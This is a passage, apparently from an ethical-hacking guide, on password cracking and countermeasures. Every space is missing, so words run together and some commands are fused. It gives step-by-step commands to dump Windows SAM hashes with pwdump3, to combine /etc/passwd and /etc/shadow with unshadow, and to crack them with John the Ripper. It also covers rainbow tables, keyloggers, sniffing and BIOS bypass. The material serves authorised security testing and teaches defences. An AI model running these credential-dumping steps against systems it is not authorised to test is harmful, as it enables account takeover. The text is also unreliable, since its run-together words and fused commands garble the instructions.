SomeWindowsapplicationsstorepasswordsintheRegistryorasplain-textfilesontheharddrive!Asimpleregistryorfile-systemsearchfor“password”mayuncoverjustwhatyou’relookingfor.
LinuxandotherUNIXvariantstypicallystorepasswordsinthesefiles:/etc/passwd(readablebyeveryone)/etc/shadow(accessiblebythesystemandtherootaccountonly)/etc/security/passwd(accessiblebythesystemandtherootaccountonly)/.secure/etc/passwd(accessiblebythesystemandtherootaccountonly)
DictionaryattacksDictionaryattacksquicklycompareasetofknowndictionary-typewords—includingmanycommonpasswords—againstapassworddatabase.Thisdatabaseisatextfilewithhundredsifnotthousandsofdictionarywordstypicallylistedinalphabeticalorder.Forinstance,supposethatyouhaveadictionaryfilethatyoudownloadedfromoneofthesitesinthefollowinglist.TheEnglishdictionaryfileatthePurduesitecontainsonewordperlinestartingwith10th,1st…allthewaytozygote.
Manypassword-crackingutilitiescanuseaseparatedictionarythatyoucreateordownloadfromtheInternet.Herearesomepopularsitesthathousedictionaryfilesandothermiscellaneouswordlists:
ftp://ftp.cerias.purdue.edu/pub/dict
www.outpost9.com/files/WordLists.html
Don’tforgettouseotherlanguagefilesaswell,suchasSpanishandKlingon.
Dictionaryattacksareonlyasgoodasthedictionaryfilesyousupplytoyourpassword-crackingprogram.Youcaneasilyspenddays,evenweeks,tryingtocrackpasswordswithadictionaryattack.Ifyoudon’tsetatimelimitorsimilarexpectationgoingin,you’lllikelyfindthatdictionarycrackingisoftenamereexerciseinfutility.Mostdictionaryattacksaregoodforweak(easily-guessed)passwords.However,somespecialdictionarieshavecommonmisspellingsoralternativespellingsofwords,suchaspa$$w0rd(password)and5ecur1ty(security).Additionally,specialdictionariescancontainnon-Englishwordsandthematicwordsfromreligions,politics,orStarTrek.
Brute-forceattacksBrute-forceattackscancrackpracticallyanypassword,givensufficienttime.Brute-forceattackstryeverycombinationofnumbers,letters,andspecialcharactersuntilthepasswordisdiscovered.Manypassword-crackingutilitiesletyouspecifysuchtestingcriteriaasthecharactersets,passwordlengthtotry,andknowncharacters(fora“mask”attack).SampleProactivePasswordAuditorbrute-forcepassword-crackingoptionsareshowninFigure8-1.
Figure8-1:Brute-forcepassword-crackingoptionsinProactivePasswordAuditor.
Abrute-forcetestcantakequiteawhile,dependingonthenumberofaccounts,
theirassociatedpasswordcomplexities,andthespeedofthecomputerthat’srunningthecrackingsoftware.Aspowerfulasbrute-forcetestingcanbe,itliterallycantakeforevertoexhaustallpossiblepasswordcombinations,whichinrealityisnotpracticalineverysituation.
Smarthackersattemptloginsslowlyoratrandomtimessothefailedloginattemptsaren’taspredictableorobviousinthesystemlogfiles.SomemalicioususersmightevencalltheIThelpdesktoattemptaresetoftheaccounttheyjustlockedout.Thissocialengineeringtechniquecouldbeamajorissue,especiallyiftheorganizationhasno(orminimal)mechanismsinplacetoverifythatlocked-outusersarewhotheysaytheyare.
Cananexpiringpassworddeterahacker’sattackandrenderpasswordcrackingsoftwareuseless?Yes.Afterthepasswordischanged,thecrackingmuststartagainifthehackerwantstotestallthepossiblecombinations.Thisisonereasonwhyit’sagoodideatochangepasswordsperiodically.Still,I’mnotabigfanofforcinguserstochangetheirpasswordsoften.Shorteningthechangeintervalcanreducetheriskofpasswordsbeingcrackedbutcanalsobepoliticallyunfavorableinyourbusinessandendupcreatingtheoppositeeffectyou’regoingfor.Youhavetostrikeabalancebetweensecurityandconvenienceandusability.Inmanysituations,Idon’tthinkit’sunreasonabletorequirepasswordchangesevery6to12monthsorafterasuspectedcompromise.
Exhaustivepasswordcrackingattemptsusuallyaren’tnecessary.Mostpasswordsarefairlyweak.Evenminimumpasswordrequirements,suchasapasswordlength,canhelpyouinyourtesting.Youmightbeabletodiscoversecuritypolicyinformationbyusingothertoolsorviayourwebbrowser.(SeePartIVfortoolsandtechniquesfortestingthesecurityofoperatingsystems.SeeChapter15forinformationontestingwebsites/applications.)Ifyoufindthispasswordpolicyinformation,youcanconfigureyourcrackingprogramswithmorewell-definedcrackingparameters,whichoftengeneratefasterresults.
RainbowattacksArainbowpasswordattackusesrainbowcrackingtocrackvariouspasswordhashesforLM,NTLM,CiscoPIX,andMD5muchmorequicklyandwithextremelyhighsuccessrates(near100percent).Passwordcrackingspeedisincreasedinarainbowattackbecausethehashesareprecalculatedandthusdon’thavetobegeneratedindividuallyontheflyastheyarewithdictionaryandbrute-forcecrackingmethods.
Unlikedictionaryandbrute-forceattacks,rainbowattackscannotbeusedtocrackpasswordhashesofunlimitedlength.Thecurrentmaximumlengthfor
MicrosoftLMhashesis14characters,andthemaximumisupto16characters(dictionary-based)forWindowsVistaand7hashes(alsoknownasNThashes).Therainbowtablesareavailableforpurchaseanddownloadviatheophcracksiteathttp://ophcrack.sourceforge.net.There’salengthlimitationbecauseittakessignificanttimetogeneratetheserainbowtables.Givenenoughtime,asufficientnumberoftableswillbecreated.Ofcourse,bythen,computersandapplicationslikelyhavedifferentauthenticationmechanismsandhashingstandards—includinganewsetofvulnerabilities—tocontendwith.JobsecurityforITprofessionalsworkinginthisareaneverceasestogrow.
Ifyouhaveagoodsetofrainbowtables,suchasthoseofferedviatheophcracksiteandProjectRainbowCrack(http://project-rainbowcrack.com),youcancrackpasswordsinseconds,minutes,orhoursversusthedays,weeks,orevenyearsrequiredbydictionaryandbrute-forcemethods.
CrackingWindowspasswordswithpwdump3andJohntheRipperThefollowingstepsusetwoofmyfavoriteutilitiestotestthesecurityofcurrentpasswordsonWindowssystems:
pwdump3(toextractpasswordhashesfromtheWindowsSAMdatabase)JohntheRipper(tocrackthehashesofWindowsandLinux/UNIXpasswords)
ThefollowingtestrequiresadministrativeaccesstoeitheryourWindowsstandaloneworkstationortheserver:
1. CreateanewdirectorycalledpasswordsfromtherootofyourWindowsC:drive.
2. Downloadandinstalladecompressiontoolifyoudon’talreadyhaveone.
WinZip(www.winzip.com)isagoodcommercialtoolIuseand7-Zip(www.7-zip.org)isafreedecompressiontool.Windowsalsoincludesbuilt-inZipfilehandling,albeitabitkludgy.
3. Download,extract,andinstallthefollowingsoftwareintothepasswordsdirectoryyoucreated,ifyoudon’talreadyhaveitonyoursystem:
pwdump3:Downloadthefilefromwww.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003-
vista-7.JohntheRipper:Downloadthefilefromwww.openwall.com/john.
4. Enterthefollowingcommandtorunpwdump3andredirectitsoutputtoafilecalledcracked.txt:
c:\passwords\pwdump3>cracked.txt
ThisfilecapturestheWindowsSAMpasswordhashesthatarecrackedwithJohntheRipper.Figure8-2showsthecontentsofthecracked.txtfilethatcontainsthelocalWindowsSAMdatabasepasswordhashes.
5. EnterthefollowingcommandtorunJohntheRipperagainsttheWindowsSAMpasswordhashestodisplaythecrackedpasswords:
c:\passwords\johncracked.txt
Thisprocess—showninFigure8-3—cantakesecondsordays,dependingonthenumberofusersandthecomplexityoftheirassociatedpasswords.MyWindowsexampletookonlyfivesecondstocrackfiveweakpasswords.
Figure8-2:Outputfrompwdump3.
Figure8-3:CrackedpasswordfilehashesusingJohntheRipper.
CrackingUNIX/LinuxpasswordswithJohntheRipperJohntheRippercanalsocrackUNIX/Linuxpasswords.Youneedrootaccesstoyoursystemandtothepassword(/etc/passwd)andshadowpassword(/etc/shadow)files.PerformthefollowingstepsforcrackingUNIX/Linuxpasswords:
1. DownloadtheUNIXsourcefilesfromwww.openwall.com/john.2. Extracttheprogrambyenteringthefollowingcommand:
[root@localhostkbeaver]#tar-zxfjohn-1.8.0.tar.xz
orwhateverthecurrentfilenameis.
YoucanalsocrackUNIXorLinuxpasswordsonaWindowssystembyusingtheWindows/DOSversionofJohntheRipper.
3. Changetothe/srcdirectorythatwascreatedwhenyouextractedtheprogram
andenterthefollowingcommand:makegeneric
4. Changetothe/rundirectoryandenterthefollowingcommandtousetheunshadowprogramtocombinethepasswdandshadowfilesandcopythemtothefilecracked.txt:
./unshadow/etc/passwd/etc/shadow>cracked.txt
Theunshadowprocesswon’tworkwithallUNIXvariants.
5. Enterthefollowingcommandtostartthecrackingprocess:./johncracked.txt
WhenJohntheRipperiscomplete(andthiscouldtakesometime),theoutputissimilartotheresultsoftheprecedingWindowsprocess.(RefertoFigure8-3.)
AftercompletingtheprecedingWindowsorUNIXsteps,youcaneitherforceuserstochangepasswordsthatdon’tmeetspecificpasswordpolicyrequirements,youcancreateanewpasswordpolicy,oryoucanusetheinformationtoupdateyoursecurityawarenessprogram.Justdosomething.
Becarefulhandlingtheresultsofyourpasswordcrackingefforts.Youcreateanaccountabilityissuebecausemorethanonepersonnowknowsthepasswords.Alwaystreatthepasswordinformationofothersasstrictlyconfidential.Ifyouendupstoringthemonyourtestsystem,makesureit’sextrasecure.Ifit’salaptop,encryptingtheharddriveisthebestdefense.
PasswordsbythenumbersOnehundredtwenty-eightdifferentASCIIcharactersareusedintypicalcomputerpasswords.(Technically,only126charactersareusedbecauseyoucan’tusetheNULLandthecarriagereturncharacters.)Atrulyrandomeight-characterpasswordthatuses126differentcharacterscanhave63,527,879,748,485,376differentcombinations.Takingthatastepfurther,ifitwerepossible(anditisinLinuxandUNIX)touseall256ASCIIcharacters(254,withoutNULLandcarriagereturncharacters)inapassword,17,324,859,965,700,833,536differentcombinationswouldbeavailable.Thisisapproximately2.7billiontimesmorecombinationsthantherearepeopleonearth!
Atextfilecontainingallthepossiblepasswordswouldrequiremillionsofterabytesofstoragespace.Evenifyouincludeonlythemorerealisticcombinationof95orsoASCIIletters,numbers,andstandardpunctuationcharacters,suchafilewouldstillfillthousandsofterabytesofstoragespace.Thesestoragerequirementsforcedictionaryandbrute-forcepassword-crackingprogramstoformthepasswordcombinationsonthefly,insteadofreadingallpossiblecombinationsfromatextfile.That’swhyrainbowattacksaremoreeffectiveatcrackingpasswordsthandictionaryandbrute-forceattacks.
Giventheeffectivenessofrainbowpasswordattacks,it’srealistictothinkthateventually,anyonewillbeabletocrackallpossiblepasswordcombinations,giventhecurrenttechnologyandaveragelifespan.Itprobablywon’thappen;however,manythoughtinthe1980sthat640KofRAManda10MBharddriveinaPCwereallthatwouldeverbeneeded!
Crackingpassword-protectedfilesDoyouwonderhowvulnerablepassword-protectedword-processing,spreadsheet,andZipfilesarewhenuserssendthemintothewildblueyonder?Wondernomore.Somegreatutilitiescanshowhoweasilypasswordsarecracked.
CrackingfilesMostpassword-protectedfilescanbecrackedinsecondsorminutes.Youcandemonstratethis“wowfactor”securityvulnerabilitytousersandmanagement.Here’sahypotheticalscenariothatcouldoccurintherealworld:
1. YourCFOwantstosendsomeconfidentialfinancialinformationinanExcelspreadsheettoacompanyboardmember.
2. Sheprotectsthespreadsheetbyassigningitapasswordduringthefile-saveprocessinExcel.
3. Forgoodmeasure,sheusesWinZiptocompressthefileandaddsanotherpasswordtomakeitreallysecure.
4. TheCFOsendsthespreadsheetasane-mailattachment,assumingthatthee-mailwillreachitsdestination.
Thefinancialadvisor’snetworkhascontentfiltering,whichmonitorsincominge-mailsforkeywordsandfileattachments.Unfortunately,thefinancialadvisoryfirm’snetworkadministratorislookinginthecontent-filteringsystemtoseewhat’scomingin.
5. Thisroguenetworkadministratorfindsthee-mailwiththeconfidentialattachment,savestheattachment,andrealizesthatit’spasswordprotected.
6. Thenetworkadministratorremembersagreatpassword-crackingtoolavailablefromElcomSoftcalledAdvancedArchivePasswordRecovery
(www.elcomsoft.com/archpr.html)thatcanhelphimoutsoheproceedstouseittocrackthepassword.
Crackingpassword-protectedfilesisassimpleasthat!Nowallthattheroguenetworkadministratormustdoisforwardtheconfidentialspreadsheettohisbuddiesortothecompany’scompetitors.
IfyoucarefullyselecttherightoptionsinAdvancedArchivePasswordRecovery,youcandrasticallyshortenyourtestingtime.Forexample,ifyouknowthatapasswordisnotoverfivecharacterslongorislowercaselettersonly,youcancutthecrackingtimeinhalf.
Irecommendperformingthesefile-password-crackingtestsonfilesthatyoucapturewithacontentfilteringornetworkanalysistool.Thisisagoodwaytodeterminewhetheryourusersareadheringtopolicyandusingadequatepasswordstoprotectsensitiveinformationthey’resending.
CountermeasuresThebestdefenseagainstweakfilepasswordprotectionistorequireyouruserstouseastrongerformoffileprotection,suchasPGP,ortheAESencryptionthat’sbuiltintoWinZip,whennecessary.Ideally,youdon’twanttorelyonuserstomakedecisionsaboutwhattheyshouldusetosecuresensitiveinformation,butit’sbetterthannothing.Stressthatafileencryptionmechanism,suchasapassword-protectedZipfile,issecureonlyifuserskeeptheirpasswordsconfidentialandnevertransmitorstoretheminunsecurecleartext(suchasinaseparatee-mail).
Ifyou’reconcernedaboutunsecuretransmissionsthroughe-mail,considerusingacontent-filteringsystemoradataloss–preventionsystemtoblockalloutbounde-mailattachmentsthataren’tprotectedonyoure-mailserver.
UnderstandingotherwaystocrackpasswordsOvertheyears,I’vefoundotherwaystocrack(orcapture)passwordstechnicallyandthroughsocialengineering.
KeystrokeloggingOneofthebesttechniquesforcapturingpasswordsisremotekeystrokelogging—theuseofsoftwareorhardwaretorecordkeystrokesasthey’retypedintothecomputer.
Becarefulwithkeystrokelogging.Evenwithgoodintentions,monitoringemployeesraisesvariouslegalissuesifit’snotdonecorrectly.Discusswithyourlegalcounselwhatyou’llbedoing,askfortheirguidance,andgetapprovalfromuppermanagement.
Loggingtools
Withkeystroke-loggingtools,youcanassessthelogfilesofyourapplicationtoseewhatpasswordspeopleareusing:
Keystroke-loggingapplicationscanbeinstalledonthemonitoredcomputer.IrecommendthatyoucheckoutSpector360bySpectorSoft(www.spector360.com).DozensofothersuchtoolsareavailableontheInternet.Hardware-basedtools,suchasKeyGhost(www.keyghost.com),fitbetweenthekeyboardandthecomputerorreplacethekeyboardaltogether.
Akeystroke-loggingtoolinstalledonasharedcomputercancapturethepasswordsofeveryuserwhologsin.
Countermeasures
Thebestdefenseagainsttheinstallationofkeystroke-loggingsoftwareonyoursystemsistouseananti-malwareprogramorsimilarendpointprotectionsoftwarethatmonitorsthelocalhost.It’snotfoolproofbutcanhelp.Asforphysicalkeyloggers,you’llneedtovisuallyinspecteachsystem.
Thepotentialforhackerstoinstallkeystroke-loggingsoftwareisanotherreasontoensurethatyourusersaren’tdownloadingandinstallingrandomsharewareoropeningattachmentsinunsolicitede-mails.ConsiderlockingdownyourdesktopsbysettingtheappropriateuserrightsthroughlocalorgroupsecuritypolicyinWindows.Alternatively,youcoulduseacommerciallockdownprogram,suchasFortres101(www.fortresgrand.com)forWindowsorDeepFreezeEnterprise(www.faronics.com/products/deep-freeze/enterprise)forWindows,Linux,andMacOSX.AdifferenttechnologythatstillfallsintothiscategoryisBit9’s“positivesecurity”whitelistingapplication(www.bit9.com)thatallowsyoutoconfigurewhichexecutablescanberunonanygivensystem.It’sintendedtofightoffadvancedmalwarebutcouldcertainlybeusedinthissituation.
WeakpasswordstorageManylegacyandstandaloneapplications,suchase-mail,dial-upnetworkconnections,andaccountingsoftware,storepasswordslocally,makingthemvulnerabletopasswordhacking.Byperformingabasictextsearch,I’vefoundpasswordsstoredincleartextonthelocalharddrivesofmachines.YoucanautomatetheprocessevenfurtherbyusingaprogramcalledFileLocatorPro(www.mythicsoft.com).IcoverthesefileandrelatedstoragevulnerabilitiesinChapter16.
Searching
Youcantryusingyourfavoritetext-searchingutility—suchastheWindowssearchfunction,findstr,orgrep—tosearchforpasswordorpasswdonyourcomputer’sdrives.Youmightbeshockedtofindwhat’sonyoursystems.Someprogramsevenwritepasswordstodiskorleavethemstoredinmemory.
Weakpasswordstorageisacriminalhacker’sdream.Headitoffifyoucan.Thisdoesn’tmeantoimmediatelyrunoffandstartusingacloud-basedpasswordmanager.Aswe’veseenovertheyears,thosesystemsgethackedaswell!
Countermeasures
Theonlyreliablewaytoeliminateweakpasswordstorageistouseonlyapplicationsthatstorepasswordssecurely.Thismightnotbepractical,butit’syouronlyguaranteethatyourpasswordsaresecure.Anotheroptionistoinstructusersnottostoretheirpasswordswhenprompted.
Beforeupgradingapplications,contactyoursoftwarevendortoseehowtheymanagepasswords,orsearchforathird-partysolution.
NetworkanalyzerAnetworkanalyzersniffsthepacketstraversingthenetwork.Thisiswhatthebadguysdoiftheycangaincontrolofacomputer,tapintoyourwirelessnetwork,orgainphysicalnetworkaccesstosetuptheirnetworkanalyzer.Iftheygainphysicalaccess,theycanlookforanetworkjackonthewallandplugrightin!
Testing
Figure8-4showshowcrystal-clearpasswordscanbethroughtheeyesofanetworkanalyzer.ThisfigureshowshowCain&Abel(www.oxid.it/cain.html)cangleanthousandsofpasswordsgoingacrossthenetworkinamatterofacoupleofhours.Asyoucanseeintheleftpane,thesecleartextpasswordvulnerabilitiescanapplytoFTP,web,telnet,andmore.(Theactualusernamesandpasswordsareblurredouttoprotectthem.)
Figure8-4:UsingCain&Abeltocapturepasswordsgoingacrossthenetwork.
IftrafficisnottunneledthroughaVPN,SSH,SSL,orsomeotherformofencryptedlink,it’svulnerabletoattack.
Cain&Abelisapassword-crackingtoolthatalsohasnetworkanalysiscapabilities.Youcanalsousearegularnetworkanalyzer,suchasthecommercialproductsOmniPeek(www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysisandCommView(www.tamos.com/products/commview)aswellasthefreeopensourceprogram,Wireshark(www.wireshark.org).Withanetworkanalyzer,youcansearchforpasswordtrafficinvariousways.Forexample,tocapturePOP3passwordtraffic,youcansetupafilterandatriggertosearchforthePASScommand.WhenthenetworkanalyzerseesthePASScommandinthepacket,itcapturesthatspecificdata.
Networkanalyzersrequireyoutocapturedataonahubsegmentofyournetworkorviaamonitor/mirror/spanportonaswitch.Otherwise,youcan’tseeanyoneelse’sdatatraversingthenetwork—justyours.Checkyourswitch’suserguideforwhetherithasamonitorormirrorportandinstructionsonhowtoconfigureit.Youcanconnectyournetworkanalyzertoahubonthepublicsideofyourfirewall.You’llcaptureonlythosepacketsthatareenteringorleavingyournetwork—notinternaltraffic.IcoverthistypeofnetworkinfrastructurehackingindetailinChapter9.
Countermeasures
Herearesomegooddefensesagainstnetworkanalyzerattacks:
Useswitchesonyournetwork,nothubs.Ethernethubsareathingofthepast,however,Istillseetheminuseoccasionally.Ifyoumustusehubsonnetworksegments,aprogramlikesniffdet(http://sniffdet.sourceforge.net)forUNIX-basedsystemsandPromiscDetect
(http://ntsecurity.nu/toolbox/promiscdetect)forWindowscandetectnetworkcardsinpromiscuousmode(acceptingallpackets,whetherdestinedforthelocalmachineornot).Anetworkcardinpromiscuousmodesignifiesthatanetworkanalyzermayberunningonthenetwork.Makesurethatunsupervisedareas,suchasanunoccupiedlobbyortrainingroom,don’thavelivenetworkconnections.Don’tletanyonewithoutabusinessneedgainphysicalaccesstoyourswitchesortothenetworkconnectiononthepublicsideofyourfirewall.Withphysicalaccess,ahackercanconnecttoaswitchmonitorportortapintotheunswitchednetworksegmentoutsidethefirewallandcapturepackets.
Switchesdon’tprovidecompletesecuritybecausethey’revulnerabletoARPpoisoningattacks,whichIcoverinChapter9.
WeakBIOSpasswordsMostcomputerBIOS(basicinput/outputsystem)settingsallowpower-onpasswordsand/orsetuppasswordstoprotectthecomputer’shardwaresettingsthatarestoredintheCMOSchip.Herearesomewaysaroundthesepasswords:
YoucanusuallyresetthesepasswordseitherbyunpluggingtheCMOSbatteryorbychangingajumperonthemotherboard.Password-crackingutilitiesforBIOSpasswordsareavailableontheInternetandfromcomputermanufacturers.Ifgainingaccesstotheharddriveisyourultimategoal,youcansimplyremovetheharddrivefromthecomputerandinstallitinanotheroneandyou’regoodtogo.ThisisagreatwaytoprovethatBIOS/power-onpasswordsarenotaneffectivecountermeasureforlostorstolenlaptops.
Foragoodlistofdefaultsystempasswordsforvariousvendorequipment,checkwww.cirt.net/passwords.
Therearetonsofvariablesforhackingandhackingcountermeasuresdependingonyourhardwaresetup.IfyouplantohackyourownBIOSpasswords,checkforinformationinyourusermanualorrefertotheBIOSpassword-hackingguideIwroteathttp://searchenterprisedesktop.techtarget.com/tutorial/BIOS-password-hacking.Ifprotectingtheinformationonyourharddrivesisyourultimategoal,thenfull(sometimesreferredtoaswhole)diskisthebestwaytogo.Icovermobile-relatedpasswordcrackingin-depthinChapter11.Thegoodnewsisthatnewercomputers(withinthepastfiveyearsorso)areusinganewtypeofBIOScalledunifiedextensiblefirmwareinterface(UEFI),whichismuchmoreresilienttoboot-levelsystemcracking
attempts.Still,aweakpasswordmaybeallittakesforthesystemtobeexploited.
WeakpasswordsinlimboBadguysoftenexploituseraccountsthathavejustbeencreatedorresetbyanetworkadministratororhelpdesk.Newaccountsmightneedtobecreatedfornewemployeesorevenforyourownsecuritytestingpurposes.Accountsmightneedtoberesetifusersforgettheirpasswordsoriftheaccountshavebeenlockedoutbecauseoffailedattempts.
Weaknesses
Herearesomereasonswhyuseraccountscanbevulnerable:
Whenuseraccountsarereset,theyoftenareassignedaneasily-crackedpassword(suchastheuser’snameorthewordpassword).Thetimebetweenresettingtheuseraccountandchangingthepasswordisaprimeopportunityforabreak-in.Manysystemshaveeitherdefaultaccountsorunusedaccountswithweakpasswordsornopasswordsatall.Theseareprimetargets.
Countermeasures
Thebestdefensesagainstattacksonpasswordsinlimboaresolidhelpdeskpoliciesandproceduresthatpreventweakpasswordsfrombeingavailableatanygiventimeduringthenewaccountgenerationandpasswordresetprocesses.Perhapsthebestwaystoovercomethisvulnerabilityareasfollows:
Requireuserstobeonthephonewiththehelpdesk,orhaveahelpdeskmemberperformtheresetattheuser’sdesk.Requirethattheuserimmediatelyloginandchangethepassword.Ifyouneedtheultimateinsecurity,implementstrongerauthenticationmethods,suchaschallenge/responsequestions,smartcards,ordigitalcertificates.Automatepasswordresetfunctionalityviaself-servicetoolsonyournetworksouserscanmanagemostoftheirpasswordproblemswithouthelpfromothers.
Icovermobile-relatedpasswordcrackinginChapter11andwebsite/applicationpasswordcrackinginChapter15.
GeneralPasswordCrackingCountermeasures
Apasswordforonesystemusuallyequalspasswordsformanyothersystemsbecausemanypeopleusethesame(oratleastsimilar)passwordsoneverysystemtheyuse.Forthisreason,youmightwanttoconsiderinstructinguserstocreatedifferentpasswordsfordifferentsystems,especiallyonthesystemsthatprotectinformationthat’smoresensitive.Theonlydownsidetothisisthatusershavetokeepmultiplepasswordsand,therefore,mightbetemptedtowritethemdown,whichcannegateanybenefits.
Strongpasswordsareimportant,butyouneedtobalancesecurityandconvenience:
Youcan’texpectuserstomemorizepasswordsthatareinsanelycomplexandmustbechangedeveryfewweeks.Youcan’taffordweakpasswordsornopasswordsatall,socomeupwithastrongpasswordpolicyandaccompanyingstandard—preferablyonethatrequireslongandstrongpassphrases(combinationsofwordsthatareeasilyrememberedyetnexttoimpossibletocrack)thathavetobechangedonlyonceortwiceayear.
StoringpasswordsIfyouhavetochoosebetweenweakpasswordsthatyouruserscanmemorizeandstrongpasswordsthatyourusersmustwritedown,Irecommendhavingreaderswritedownpasswordsandstoretheinformationsecurely.Trainuserstostoretheirwrittenpasswordsinasecureplace—notonkeyboardsorineasilycrackedpassword-protectedcomputerfiles(suchasspreadsheets).Usersshouldstoreawrittenpasswordinanyoftheselocations:
AlockedfilecabinetorofficesafeFull(whole)diskencryptionwhichcanpreventanintruderfromeveraccessingtheOSandpasswordsstoredonthesystem.Justknowit’snotfoolproof,asIoutlineinChapter11.Asecurepasswordmanagementtoolsuchas:
LastPass(http://lastpass.com)PasswordSafe,anopensourcesoftwareoriginallydevelopedbyCounterpane(http://passwordsafe.sourceforge.net)
Again,asImentionedearlier,applicationssuchasthesearenotimpervioustoattacksobecareful.
Nopasswordsonstickynotes!Peoplejokeaboutit,butitstillhappensalot,andit’snotgoodforbusiness!
CreatingpasswordpoliciesAsanethicalhacker,youshouldshowuserstheimportanceofsecuringtheirpasswords.Herearesometipsonhowtodothat:
Demonstratehowtocreatesecurepasswords.Refertothemaspassphrasesbecausepeopletendtotakepasswordsliterallyanduseonlywords,whichcanbelesssecure.Showwhatcanhappenwhenweakpasswordsareusedorpasswordsareshared.Diligentlybuilduserawarenessofsocialengineeringattacks.
Enforce(oratleastencouragetheuseof)astrongpassword-creationpolicythatincludesthefollowingcriteria:
Useupper-andlowercaseletters,specialcharacters,andnumbers.Neveruseonlynumbers.Suchpasswordscanbecrackedquickly.Misspellwordsorcreateacronymsfromaquoteorasentence.Forexample,ASCIIisanacronymforAmericanStandardCodeforInformationInterchangethatcanalsobeusedaspartofapassword.Usepunctuationcharacterstoseparatewordsoracronyms.Changepasswordsevery6to12monthsorimmediatelyifthey’resuspectedofbeingcompromised.Anythingmorefrequentintroducesaninconveniencethatservesonlytocreatemorevulnerabilities.Usedifferentpasswordsforeachsystem.Thisisespeciallyimportantfornetworkinfrastructurehosts,suchasservers,firewalls,androuters.It’sokaytousesimilarpasswords—justmakethemslightlydifferentforeachtypeofsystem,suchasSummerInTheSouth-Win10forWindowssystemsandLinux+SummerInTheSouthforLinuxsystems.Usevariable-lengthpasswords.Thistrickcanthrowoffattackersbecausetheywon’tknowtherequiredminimumormaximumlengthofpasswordsandmusttryallpasswordlengthcombinations.Don’tusecommonslangwordsorwordsthatareinadictionary.Don’trelycompletelyonsimilar-lookingcharacters,suchas3insteadofE,5insteadofS,or!insteadof1.Password-crackingprogramsanddictionariesareavailabletohelpcheckforthis.Don’treusethesamepasswordwithinatleastfourtofivepasswordchanges.
Usepassword-protectedscreensavers.Unlockedscreensareagreatwayforsystemstobecompromised.Youcouldhavethestrongestpasswordsandbestfulldiskencryptionintheworld,butnoneofthatmattersifthecomputerisleftunattendedwiththescreenunlocked.Don’tsharepasswords.Toeachhisorherown!Avoidstoringuserpasswordsinanunsecuredcentrallocation,suchasanunprotectedspreadsheetonaharddrive.Thisisaninvitationfordisaster.Useapasswordmanagertostoreuserpasswordsifyou’rewilling.I’mnot,justyet.
TakingothercountermeasuresHerearesomeotherpasswordhackingcountermeasuresthatIrecommend:
Enablesecurityauditingtohelpmonitorandtrackpasswordattacks.
Testyourapplicationstomakesuretheyaren’tstoringpasswordsindefinitelyinmemoryorwritingthemtodisk.AgoodtoolforthisisWinHex(www.winhex.com/winhex/index-m.html).I’veusedthistooltosearchacomputer’smemoryforpassword,pass=,login,andsoonandhavecomeupwithsomepasswordsthatthedevelopersthoughtwereclearedfrommemory.
Somepassword-crackingTrojan-horseapplicationsaretransmittedthroughwormsorsimplee-mailattachments.Suchmalwarecanbelethaltoyourpassword-protectionmechanismsifthey’reinstalledonyoursystems.Thebestdefenseismalwareprotectionorwhitelistingsoftware,fromWebroot,McAfee,orBit9.
Keepyoursystemspatched.Passwordsareresetorcompromisedduringbufferoverflowsorotherdenialofservice(DoS)conditions.KnowyouruserIDs.Ifanaccounthasneverbeenused,deleteordisabletheaccountuntilit’sneeded.YoucandetermineunusedaccountsbymanualinspectionorbyusingatoolsuchasDumpSec(www.systemtools.com/somarsoft/?somarsoft.com),atoolthatcanenumeratetheWindowsoperatingsystemandgatheruserIDsandotherinformation.
Asthesecuritymanagerinyourorganization,youcanenableaccountlockouttopreventpassword-crackingattempts.Accountlockoutistheabilitytolockuseraccountsforacertaintimeafteracertainnumberoffailedloginattemptshasoccurred.Mostoperatingsystems(andsomeapplications)havethiscapability.Don’tsetittoolow(fewerthanfivefailedlogins),anddon’tsetittoohightogiveamalicioususeragreaterchanceofbreakingin.Somewherebetween5and50mightworkforyou.Iusuallyrecommendasettingofaround10or15.Considerthefollowingwhenconfiguringaccountlockoutonyoursystems:
TouseaccountlockouttopreventanypossibilitiesofauserDoScondition,require
twodifferentpasswords,anddon’tsetalockouttimeforthefirstoneifthatfeatureisavailableinyouroperatingsystem.Ifyoupermitautoresetoftheaccountafteracertainperiod—oftenreferredtoasintruderlockout—don’tsetashorttimeperiod.Thirtyminutesoftenworkswell.
Afailedlogincountercanincreasepasswordsecurityandminimizetheoveralleffectsofaccountlockoutiftheaccountexperiencesanautomatedattack.Alogincountercanforceapasswordchangeafteranumberoffailedattempts.Ifthenumberoffailedloginattemptsishighandoccurredoverashortperiod,theaccounthaslikelyexperiencedanautomatedpasswordattack.
Otherpassword-protectioncountermeasuresinclude
Strongerauthenticationmethods.Examplesofthesearechallenge/response,smartcards,tokens,biometrics,ordigitalcertificates.Automatedpasswordreset.Thisfunctionalityletsusersmanagemostoftheirpasswordproblemswithoutgettingothersinvolved.Otherwise,thissupportissuebecomesexpensive,especiallyforlargerorganizations.Password-protectthesystemBIOS.Thisisespeciallyimportantonserversandlaptopsthataresusceptibletophysicalsecuritythreatsandvulnerabilities.
SecuringOperatingSystemsYoucanimplementvariousoperatingsystemsecuritymeasurestoensurethatpasswordsareprotected.
Regularlyperformtheselow-techandhigh-techpassword-crackingteststomakesurethatyoursystemsareassecureaspossible—perhapsaspartofamonthly,quarterly,orbiannualauditoflocalanddomainpasswords.
WindowsThefollowingcountermeasurescanhelppreventpasswordhacksonWindowssystems:
SomeWindowspasswordscanbegleanedbysimplyreadingthecleartextorcrackableciphertextfromtheWindowsRegistry.Secureyourregistriesbydoingthefollowing:
Allowonlyadministratoraccess.Hardentheoperatingsystembyusingwell-knownhardeningbestpractices,suchasthosefromSANS(www.sans.org),NIST(http://csrc.nist.gov),theCenterforInternetSecurityBenchmarks/ScoringTools(www.cisecurity.org),andtheonesoutlinedinNetworkSecurityForDummiesbyCheyCobb.
KeepallSAMdatabasebackupcopiessecure.
DisablethestorageofLMhashesinWindowsforpasswordsthatareshorterthan15characters.
Forexample,youcancreateandsettheNoLMHashregistrykeytoavalueof1underHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa.
UselocalorgroupsecuritypoliciestohelpeliminateweakpasswordsonWindowssystemsbeforethey’recreated.DisablenullsessionsinyourWindowsversionorenabletheWindowsFirewall.InWindowsXPandlaterversions,enabletheDoNotAllowAnonymousEnumerationofSAMAccountsandSharesoptioninthelocalsecuritypolicy.
Chapter12coversWindowshacksyouneedtounderstandandtestinmoredetail.
